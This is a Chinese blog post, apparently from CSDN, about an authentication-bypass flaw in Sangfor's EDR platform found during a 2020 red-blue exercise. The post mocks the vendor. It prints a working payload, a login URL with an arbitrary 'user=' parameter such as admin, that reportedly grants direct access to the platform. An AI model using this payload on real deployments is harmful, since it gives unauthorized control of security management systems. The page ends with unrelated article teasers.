信服的不屈之心--终端检测响应平台漏洞再次爆发!

最新推荐文章于 2024-05-29 08:30:53 发布
最新推荐文章于 2024-05-29 08:30:53 发布
阅读量1.5k 收藏 2
点赞数 4
文章标签: 安全 信息安全 红蓝攻防 安全产品漏洞 shen信服
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37367124/article/details/108127790
版权

可能大家都有所耳闻,行动结束了。

当时是众说纷纭,有说甲方扛不住的,有说是红方的钓鱼信息的。刚开始我也以为是红队故意发的消息。

还有民间传言,各方猜测,各位吃瓜群众简直是云里雾里,到现在仍然是未知。 

可是,这并不影响大佬们对此次HW行动的神级操作。

就在今天(2020.8.20)凌晨左右(高手一般都是在夜深人静的时候行动)!

SXF的设备又。。。。哎,出现幺蛾子了。还是那个熟悉的EDR,老朋友了害。

不多说了,直接上payload:

payload: https://ip/ui/login.php?user=任意发挥

比如说:

payload: https://10.0.0.12/ui/login.php?user=admin

竟然直接可以登录平台!简直是滑天下之大稽。

作为安全公司,内心的千军万马肯定是奔腾而过!

源码上一张大佬的:

吐槽如下:

SXF:

关于此次活动:

1.24字社会主义核心价值观

2.没有网络安全就没有国家安全

3.各界高手、精英统一战线维护国家网络安全。

 

阿小仔
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
fake-tweet-generator:生成令人信服的假推文图像
07-24
假推文生成器描述使用假推文生成器工具,您可以创建令人信服的假推文图像。 该工具是完全可定制的,因此您可以选择任何名称、任何内容、任何时间、任意数量的喜欢等等。现场演示看到它住。执照该项目已获得许可。...
一文读懂HW护网行动(附零基础学习教程)
weixin_51725318的博客
05-08 3886
一文读懂HW护网行动(附零基础学习教程)
【经验分享】2023护网HW行动必看指南
Hacker0830的博客
07-28 1万+
的护网又开始摇人了,不知道大家有想法没?去的护网结束之后,朋友圈感觉是在过,到处是倒计时和庆祝声。看得出来防守方们7*24小时的看监控还是比较无奈的。本次复盘基于我对整个护网行动的观察总结而来,仅代表我个人观点,如有不妥之处,欢迎交流。经常有人问,是攻击队厉害还是防守队厉害?经过我这些的思考,还是没有得出一个确切的结论。有时候觉得攻击队厉害,因为攻击可以在非特定时间随意发起,出其不意攻其不备,甚至手持0day指哪打哪,毕竟木桶原理决定着攻破一处即可内部突袭;
【2024版】最新HW参考 | HVV行动之蓝军经验总结(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-29 1044
但是相当多的二级单位或者中型公司,可能没那么专业,然后听从乙方来忽悠,上一堆设备,上大屏展示,图很酷炫,数字很夸张,每天防守几万次攻击,不是说这些没用,而是首先要立足于将产品和服务用好,比如资产梳理,比如防火墙,waf策略优化,这个应该是甲方最基础的事情,也不应该全部交给乙方,有的单位被忽悠上了态势感知,但是连基本的waf策略也没有优化,报表表面上很客观,实际的攻击含金量很低。4.稳扎稳打,有效联动,快速响应,让自己的各种安全设备发挥出最大效能,敌我双方都有漏洞的情况下,就比谁的的响应快谁响应快谁就赢。
什么是HW,企业如何进行HW保障?
学而思(xiejava的blog)
04-07 1744
网络安全形势近出现新变化,网络安全态势变得越来越复杂,黑客攻击入侵、勒索病毒等网络安全事件愈演愈烈,严重威胁到我国的网络空间安全。同时,国内不少关键信息基础设施的建设管理单位安全意识不够、安全投入不足,面临网络安全保护的巨大挑战,让国家关键信息基础设施成为网络攻击的重灾区。护网行动是由公安部牵头,针对全国范围的真实网络目标单位进行的一种网络安全攻防演练。这种行动的主要目的是评估企事业单位的网络安全防护能力和水平,发现可能存在的安全漏洞,并提升相关人员的网络安全意识和应对能力。
重磅!2023HW行动正式开启人员招募!
jennycisp的博客
07-13 2835
5.熟悉常见权限维持工具的使用和基本原理,包括webshell如冰蝎、哥斯拉、内存webshell等,后门工具,如cs、msf等、网络透传工具类如frp、ew等、协议隧道如http复用、ssh、icmp、dns等;2.了解Web通用安全漏洞如SQL注入、文件上传、信息泄露、反序列化、命令注入等漏洞原理和利用方式,熟悉常见系统服务、应用中间件、开发框架等安全漏洞;7.具备通过日志分析、文件分析、进程分析、计划任务等手段,上机对对包括且不限于2、3、4等攻击手段进行攻击研判和取证分析的能力。
HW行动蓝队攻略:塔防大神就是你
资深程序员,曾自学JAVA,C#,如今从业于网安行业
01-12 1117
部分0day利用成功后需要主机读写文件权限,部署终端防护系统,一是监控非白名单地址的运维操作和敏感操作命令,及时发现异常命令执行行为,包括攻击者常用的whoami、id等。定期进行漏洞扫描和渗透测试,以发现系统中存在的漏洞,并评估潜在的威胁。部署高交互、高仿真蜜罐,将vpn、oa系统做蜜罐备份,攻防期间替换掉真实业务域名,混淆攻击者,捕获零日漏洞。0day漏洞是一项复杂的任务,因为这些漏洞尚未被公开并且还没有相关的修复补丁,以下是几个明确的步骤来帮助您提高系统的安全性,并降低受到0day漏洞攻击的风险。
信服云智能边缘计算平台彩页-8页
05-07
边缘计算平台知识点总结 边缘计算作为云计算的能力补充,在靠近数据生产源头的网络边缘提供计算、存储、AI、IoT 等核心能力。深信服智能边缘计算平台是面向能源、工业、园区、交通等场景推出的云边一体化协同产品,...
信服云桌面云-一体机VDS产品彩页
05-05
信服云桌面云_一体机VDS产品彩页
Procedural-World:程序生成的地形世界!
03-19
这可用于创建逼真的地形,因为它会创建令人信服的起伏丘陵。然后,通过分层不同的Perlin噪声层,您可以得到更加逼真的地形,从而使所有地形都不那么平滑。 气候 要忽略每个点应该位于哪个生物群系中,我们需要锻炼...
信服_信服云盾--云防护服务_产品彩页.pdf
09-25
信服_信服云盾--云防护服务_产品彩页.pdf
2020HW行动-安全解决方案.pdf
07-05
2020HW行动-安全解决方案
HW网络管理系统
09-29
HW网络管理系统讲解版,不错不错不错不错不错
2021HW行动最新材料.zip
02-20
HW行动大成,包含HW业务拓展指引、HW安全保障解决方案、HW弹药库、技术答疑、HW报价模板、立项报告模板、HW过程系列文档、攻防演练应急预案、正式HW阶段交付物等等
小白想学习参加HW行动 看这篇就够了(包含安全攻防知识库)
MachineGunJoe666
06-08 828
HVV行动是一种旨在加强网络安全防御能力和防范网络攻击的测试活动,通常由红蓝对抗、渗透测试、漏洞扫描、安全审计等多种测试方法组成。相对门槛比较高。但安全人才,不论出身,高手在民间。如果你的技术过硬,都有机会参与进来。因此建议大家不断学习,提升技术。
HW护网即将开始4(1),2024最新深度解析跳槽从开始到结束完整流程
2401_83740189的博客
04-17 1122
在临战初期,客户举行了两场攻防演练,通过公司内分队对攻到从上往下发起的攻击。这次演练发现了在备战期所忽略的地方:在备战期对风险点进行排查的时候侧重于WEB漏洞而忽视了其他漏洞的渗透及验证,导致在演练的时候被攻击方通过中间件漏洞攻破;还有就是在备战期对VPN没有做好严格的把控,以致于VPN的用户名及密码明文存储在APP中,被攻击方成功反编译出密码,直接进入内网。
第一次护网HW心得
热门推荐
qq_43678263的博客
03-31 1万+
文章目录背景实战理解两张有趣图片(手动滑稽) 背景 我开始接触实战,是从某省第五届网络空间安全竞赛开始的,我参加过第四届比赛,是标准的CTF形式,初赛线上做题,决赛线下AWD攻防。但第五届突然转变了形式,线下变成了贴近实战的护网攻防演练形式:22支攻击队申请合法ip,进攻承办方官方网站,将漏洞上报,以漏洞危急程度和数量评分排名。这是我们第一次参加护网形式,拿到了一个高危,两个中危,排到第十,勉强得到三等奖。主要在实战方面还是没有经验,不太熟练,进攻时没有完整的方法体系,只有没有方向地尝试。实战所要求的..
信服OSM-1000堡垒主机部署方式有几种
03-28
OSM-1000堡垒主机部署方式有两种: 1. 单机部署:在一台服务器上安装OSM-1000堡垒主机软件,并将需要管理的服务器添加到该主机中进行管理。 2. 集群部署:将OSM-1000堡垒主机软件部署在多台服务器上,通过负载均衡等方式实现高可用性和性能扩展,同时将需要管理的服务器添加到该主机集群中进行管理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值